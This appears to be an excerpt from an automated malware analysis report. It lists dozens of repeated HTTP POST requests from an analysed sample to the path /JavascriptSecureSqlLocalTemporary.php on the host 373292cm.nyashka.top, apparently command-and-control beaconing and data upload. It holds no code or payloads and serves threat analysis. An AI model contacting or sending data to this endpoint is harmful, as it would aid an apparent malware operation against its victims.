                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 156172Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
